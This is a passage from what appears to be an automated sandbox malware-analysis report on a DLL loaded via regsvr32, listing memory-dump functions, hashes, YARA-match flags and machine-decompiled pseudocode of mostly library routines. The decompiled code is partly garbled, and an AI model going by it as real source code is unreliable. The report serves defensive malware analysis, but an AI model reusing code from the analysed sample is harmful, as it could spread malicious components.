                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                            • Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
                                                                                            • Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                            • Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00732C78 Relevance: .1, Instructions: 128COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                            • Instruction ID: 2bbe0064c7cc50be6dde76902d7839318a93b0d10f6361fc57af4654519b3f9f
                                                                                            • Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                            • Instruction Fuzzy Hash: 7B51F770518788CBEBBADF34C8992D97BB0FB58304F90861DD84E8E290DB78574ACB41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180006818 Relevance: .1, Instructions: 126COMMONLIBRARYCODECrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 56%
                                                                                            			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed long long _t74;
				signed long long _t76;
				signed long long _t77;
				signed int* _t90;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 8)) = __rbx;
				 *((long long*)(_t117 + 0x10)) = _t115;
				 *((long long*)(_t117 + 0x18)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t90 =  *_t66;
				if (_t90 == 0) goto 0x800069ac;
				_t124 =  *0x80021010; // 0x5e1a320b5ccd
				_t111 = _t124 ^  *_t90;
				asm("dec eax");
				_t74 = _t124 ^ _t90[4];
				asm("dec ecx");
				asm("dec eax");
				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
				_t101 =  >  ? _t66 : _t76;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t76) + _t76;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
				_t24 = E0000000118000878C(_t66, _t111);
				if (_t66 != 0) goto 0x800068e2;
				_t104 = _t76 + 4;
				r8d = 8;
				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E0000000118000878C(_t66, _t111);
				if (_t129 == 0) goto 0x800069ac;
				_t123 = _t129 + _t76 * 8;
				_t77 = _t129 + _t104 * 8;
				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x80021010; // 0x5e1a320b5ccd
				r8d = 0x40;
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x80021010; // 0x5e1a320b5ccd
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x80021010; // 0x5e1a320b5ccd
				asm("dec eax");
				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
				_t98 =  *0x80021010; // 0x5e1a320b5ccd
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t77 ^ _t98;
				goto 0x800069af;
				return 0xffffffff;
			}
























                                                                                            0x180006818
                                                                                            0x180006818
                                                                                            0x180006818
                                                                                            0x18000681d
                                                                                            0x180006822
                                                                                            0x180006830
                                                                                            0x180006835
                                                                                            0x180006838
                                                                                            0x18000683e
                                                                                            0x180006844
                                                                                            0x180006851
                                                                                            0x18000685a
                                                                                            0x180006864
                                                                                            0x180006868
                                                                                            0x18000686b
                                                                                            0x180006871
                                                                                            0x18000687f
                                                                                            0x180006889
                                                                                            0x18000688d
                                                                                            0x180006890
                                                                                            0x180006893
                                                                                            0x18000689a
                                                                                            0x18000689c
                                                                                            0x18000689c
                                                                                            0x1800068a6
                                                                                            0x1800068b0
                                                                                            0x1800068b8
                                                                                            0x1800068ba
                                                                                            0x1800068be
                                                                                            0x1800068ca
                                                                                            0x1800068d1
                                                                                            0x1800068d4
                                                                                            0x1800068dc
                                                                                            0x1800068e9
                                                                                            0x1800068ed
                                                                                            0x180006905
                                                                                            0x180006909
                                                                                            0x18000690c
                                                                                            0x180006914
                                                                                            0x180006917
                                                                                            0x18000691e
                                                                                            0x18000693d
                                                                                            0x180006943
                                                                                            0x180006946
                                                                                            0x180006959
                                                                                            0x180006962
                                                                                            0x180006968
                                                                                            0x180006979
                                                                                            0x180006982
                                                                                            0x180006986
                                                                                            0x180006992
                                                                                            0x18000699b
                                                                                            0x1800069a6
                                                                                            0x1800069aa
                                                                                            0x1800069c7

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 485612231-0
                                                                                            • Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                            • Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
                                                                                            • Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                            • Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073B83C Relevance: .1, Instructions: 119COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                            • Instruction ID: f0f4143308733c6b613d10fc1976db2b930a1afdf93f2980ccc893bd25ecca25
                                                                                            • Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                            • Instruction Fuzzy Hash: 61511971904749CBDB48CF64C8895DEBBF1FB48318F11875CE89AA7260D7B89A44CF45
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007390F8 Relevance: .1, Instructions: 119COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                            • Instruction ID: 83427dfa23f2a70278a699d02d0a66f070038fa0ac44bc3c67a0d98940a2abd4
                                                                                            • Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                            • Instruction Fuzzy Hash: 0B51A2B090474E8FDB48CF68D48A5DE7FB0FB68398F204619E81596250D7B4D6A5CFC0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00745CC4 Relevance: .1, Instructions: 107COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                            • Instruction ID: f005c9f9cfa4b43ef40a1f200820e7364ae690337b4d86acfb76df656cc06b6e
                                                                                            • Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                            • Instruction Fuzzy Hash: FE51A4B090438E8FDB88CF68D88A5CE7BF0FB58358F105619F865A6250D3B8D664CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00755450 Relevance: .1, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                            • Instruction ID: 91ff94ea0c5782c6c7647ce2e012ae1efe71cbab2136cbe17c29bc20620c73ea
                                                                                            • Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                            • Instruction Fuzzy Hash: 0D519DB490438E8FDB48CF68C88A5DF7BB1FB58348F004A19E825A6250D3B8D665CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074CC84 Relevance: .1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                            • Instruction ID: 392ce423c7346341374f25ca15bca0a147c997c9a5c649058bf5d583ff591b19
                                                                                            • Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                            • Instruction Fuzzy Hash: 0A41C3B090074E8FDB48DF64C48A5DE7FB0FB68388F104619E81AA6250D378D6A4CFC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073FFB8 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                            • Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
                                                                                            • Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                            • Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00748E08 Relevance: .1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                            • Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
                                                                                            • Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                            • Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00744F18 Relevance: .1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                            • Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
                                                                                            • Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                            • Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007415C8 Relevance: .1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                            • Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
                                                                                            • Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                            • Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00000001800070A0 Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 86%
                                                                                            			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x800223a8 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x80007101;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x800223a8; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x800223a8 = r8d;
				 *0x800223ac = r8d;
				return 0;
			}







                                                                                            0x1800070a0
                                                                                            0x1800070a6
                                                                                            0x1800070ab
                                                                                            0x1800070b2
                                                                                            0x1800070b2
                                                                                            0x1800070b9
                                                                                            0x1800070bb
                                                                                            0x1800070c3
                                                                                            0x1800070c9
                                                                                            0x1800070cd
                                                                                            0x1800070d3
                                                                                            0x1800070d7
                                                                                            0x1800070e1
                                                                                            0x1800070eb
                                                                                            0x1800070f6
                                                                                            0x1800070fa
                                                                                            0x180007101
                                                                                            0x18000710f

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                            • Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
                                                                                            • Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                            • Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180010190 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: GestureInfo$CloseHandle
                                                                                            • String ID: 8
                                                                                            • API String ID: 372500805-4194326291
                                                                                            • Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                            • Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
                                                                                            • Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                            • Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00000001800106E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                            • String ID: i
                                                                                            • API String ID: 3181456275-3865851505
                                                                                            • Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                            • Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
                                                                                            • Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                            • Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000000018000FCB0 Relevance: 13.7, APIs: 9, Instructions: 204COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                            • String ID:
                                                                                            • API String ID: 1917832262-0
                                                                                            • Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                            • Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
                                                                                            • Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                            • Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180003328 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 66%
                                                                                            			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t128;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t154;
				void* _t173;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				void* _t209;
				signed long long _t219;
				signed long long _t220;
				signed long long _t226;
				long long _t228;
				signed int _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				signed long long _t246;
				long long _t267;
				signed int* _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				signed long long _t284;
				long long _t296;
				signed int _t307;
				unsigned long long _t313;

				_t180 = __esi;
				_t282 = _t283 - 0x28;
				_t284 = _t283 - 0x128;
				_t219 =  *0x80021010; // 0x5e1a320b5ccd
				_t220 = _t219 ^ _t284;
				 *(_t282 + 0x10) = _t220;
				_t280 =  *((intOrPtr*)(_t282 + 0x90));
				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
				 *((long long*)(_t284 + 0x68)) = __r8;
				_t236 = __rcx;
				 *((long long*)(_t284 + 0x78)) = __rdx;
				 *(_t282 - 0x68) = _t307;
				 *((char*)(_t284 + 0x60)) = 0;
				_t281 = __r9;
				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
				r14d = _t128;
				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
				if ( *_t236 != 0xe06d7363) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
				E00000001180002D40(_t220);
				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
				E00000001180002D40(_t220);
				_t237 =  *((intOrPtr*)(_t220 + 0x20));
				E00000001180002D40(_t220);
				 *((char*)(_t284 + 0x60)) = 1;
				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
				E00000001180002D40(_t220);
				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
				E00000001180002D40(_t220);
				E00000001180002D40(_t220);
				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
				goto 0x800037b0;
				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t282 - 0x48) = _t280;
				if ( *_t237 != 0xe06d7363) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
				r15d = 0;
				if (_t280[3] - r15d <= 0) goto 0x80003678;
				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
				 *(_t284 + 0x20) = _t280;
				r8d = r14d;
				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
				_t296 =  *((intOrPtr*)(_t282 - 0x28));
				r13d =  *((intOrPtr*)(_t282 - 0x30));
				 *((long long*)(_t282 - 0x80)) = _t296;
				_t146 = r13d;
				asm("inc ecx");
				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t146 - r14d > 0) goto 0x8000366b;
				_t226 =  *(_t282 - 0x60) >> 0x20;
				if (r14d - _t146 > 0) goto 0x8000366b;
				r12d = r15d;
